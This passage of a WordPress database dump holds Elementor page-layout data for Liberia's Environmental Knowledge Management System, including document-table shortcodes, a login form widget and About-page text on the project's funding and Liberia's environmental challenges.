width=\\\"auto,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11837,1923,'_elementor_edit_mode','builder'),(11838,1923,'_elementor_template_type','wp-page'),(11839,1923,'_elementor_version','2.7.5'),(11840,1923,'_wp_page_template','default'),(11841,1923,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"title,\\ndescription,\\ntax:resource_tag:Source\\/Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11845,1924,'_elementor_edit_mode','builder'),(11846,1924,'_elementor_template_type','wp-page'),(11847,1924,'_elementor_version','2.7.5'),(11848,1924,'_wp_page_template','default'),(11849,1924,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"title,\\nexcerpt,\\ntax:resource_tag:Source\\/Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11853,1925,'_elementor_edit_mode','builder'),(11854,1925,'_elementor_template_type','wp-page'),(11855,1925,'_elementor_version','2.7.5'),(11856,1925,'_wp_page_template','default'),(11857,1925,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"title,\\nexcerpt,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11860,1926,'_elementor_edit_mode','builder'),(11861,1926,'_elementor_template_type','wp-page'),(11862,1926,'_elementor_version','2.7.5'),(11863,1926,'_wp_page_template','default'),(11864,1926,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"title,\\nexcerpt,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11879,1931,'_elementor_edit_mode','builder'),(11880,1931,'_elementor_template_type','wp-page'),(11881,1931,'_elementor_version','2.7.5'),(11882,1931,'_wp_page_template','default'),(11883,1931,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"400px,450px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11902,1937,'_elementor_template_type','page'),(11903,1937,'_edit_lock','1573534949:1'),(11904,1937,'_edit_last','1'),(11906,1937,'ocean_sidebar','0'),(11907,1937,'ocean_second_sidebar','0'),(11908,1937,'ocean_disable_margins','enable'),(11909,1937,'ocean_display_top_bar','default'),(11910,1937,'ocean_display_header','default'),(11911,1937,'ocean_center_header_left_menu','0'),(11912,1937,'ocean_custom_header_template','0'),(11913,1937,'ocean_header_custom_menu','0'),(11914,1937,'ocean_menu_typo_font_family','0'),(11915,1937,'ocean_disable_title','default'),(11916,1937,'ocean_disable_heading','default'),(11917,1937,'ocean_disable_breadcrumbs','default'),(11918,1937,'ocean_display_footer_widgets','default'),(11919,1937,'ocean_display_footer_bottom','default'),(11920,1937,'ocean_custom_footer_template','0'),(11921,1937,'osh_disable_topbar_sticky','default'),(11922,1937,'osh_disable_header_sticky','default'),(11923,1937,'osh_sticky_header_style','default'),(11924,1937,'_elementor_edit_mode','builder'),(11925,1937,'_elementor_version','2.7.5'),(11932,1937,'_wp_page_template','elementor_canvas'),(11933,1937,'_elementor_data','[{\"id\":\"8aaa4d0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1c25925\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37b2294\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dafdd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">The EKMS Will be up soon. Please check back soon!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1d3d32c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5e59186\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"250\",\"bottom\":\"0\",\"left\":\"250\",\"isLinked\":false}},\"elements\":[{\"id\":\"fc01937\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df620ef\",\"elType\":\"widget\",\"settings\":{\"user_label\":\"Username or Email\",\"pass_label\":\"Password\",\"user_placeholder\":\"Username or Email Address\",\"pass_placeholder\":\"Password\",\"submit_text\":\"Log In\",\"lost_password_text\":\"Forgot your password?\",\"show_privacy_policy\":\"\"},\"elements\":[],\"widgetType\":\"oew-login\"}],\"isInner\":false}],\"isInner\":false}]'),(11934,1940,'_elementor_template_type','page'),(11935,1940,'_elementor_controls_usage','a:0:{}'),(11936,1940,'_elementor_edit_mode','builder'),(11937,1940,'_elementor_version','2.7.5'),(11938,1940,'_wp_page_template','elementor_canvas'),(11939,1940,'_elementor_data','[{\"id\":\"8aaa4d0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1c25925\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"37b2294\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dafdd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"W\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11940,1941,'_elementor_template_type','page'),(11941,1941,'_elementor_edit_mode','builder'),(11942,1941,'_elementor_version','2.7.5'),(11943,1941,'_wp_page_template','elementor_canvas'),(11944,1941,'_elementor_data','[{\"id\":\"8aaa4d0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1c25925\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"37b2294\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dafdd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">The EKMS Will be up soon. Please check back soon!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11946,1942,'_elementor_template_type','page'),(11947,1942,'_elementor_edit_mode','builder'),(11948,1942,'_elementor_version','2.7.5'),(11949,1942,'_wp_page_template','elementor_canvas'),(11950,1942,'_elementor_data','[{\"id\":\"8aaa4d0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1c25925\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37b2294\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dafdd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">The EKMS Will be up soon. Please check back soon!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11952,1943,'_elementor_template_type','page'),(11953,1943,'_elementor_edit_mode','builder'),(11954,1943,'_elementor_version','2.7.5'),(11955,1943,'_wp_page_template','elementor_canvas'),(11956,1943,'_elementor_data','[{\"id\":\"8aaa4d0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1c25925\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37b2294\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dafdd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">The EKMS Will be up soon. Please check back soon!<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1d3d32c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5e59186\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"250\",\"bottom\":\"0\",\"left\":\"250\",\"isLinked\":false}},\"elements\":[{\"id\":\"fc01937\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df620ef\",\"elType\":\"widget\",\"settings\":{\"user_label\":\"Username or Email\",\"pass_label\":\"Password\",\"user_placeholder\":\"Username or Email Address\",\"pass_placeholder\":\"Password\",\"submit_text\":\"Log In\",\"lost_password_text\":\"Forgot your password?\",\"show_privacy_policy\":\"\"},\"elements\":[],\"widgetType\":\"oew-login\"}],\"isInner\":false}],\"isInner\":false}]'),(11957,1937,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:2;}}}}}'),(11964,1944,'_elementor_edit_mode','builder'),(11965,1944,'_elementor_template_type','wp-page'),(11966,1944,'_elementor_version','2.7.5'),(11967,1944,'_wp_page_template','default'),(11968,1944,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p><p><p><p><p><p><p><p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11971,1945,'_elementor_edit_mode','builder'),(11972,1945,'_elementor_template_type','wp-page'),(11973,1945,'_elementor_version','2.7.5'),(11974,1945,'_wp_page_template','default'),(11975,1945,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<h3><h4>A1. Global Environmental Challenges<h4><p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone.  Liberia is divided into 15 counties, which are subdivided into 90 districts.  Although Liberia is a rather small country, it has significant biodiversity.  There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants.   Some notable species in Liberia include western chimpanzees, forest elephants, and leopards.   Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore.  Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012). \\nLiberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution.  The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot.  This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia.  Unfortunately, this remaining forest is at risk serious risk of deforestation.  Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000.  Increases in deforestation and land degradation are largely due to displaced people clearing land.  Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction.  Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).\\nClimate change also poses a real threat to Liberia.  Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment).  Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation.  Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).\\nAlthough aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to 